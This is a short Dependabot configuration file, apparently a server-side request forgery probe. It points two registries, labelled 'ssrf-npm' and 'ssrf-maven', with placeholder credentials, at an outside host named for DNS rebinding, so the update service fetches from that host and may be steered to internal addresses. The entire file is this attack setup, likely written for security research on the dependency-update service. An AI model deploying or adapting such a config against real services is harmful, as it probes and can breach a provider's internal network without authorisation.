version: 2
registries:
  ssrf-npm:
    type: npm-registry
    url: http://t1.rebind.beeli.id/dependabot-npm
    token: fake
  ssrf-maven:
    type: maven-repository
    url: http://t1.rebind.beeli.id/dependabot-maven
    username: test
    password: test

updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    registries:
      - ssrf-npm
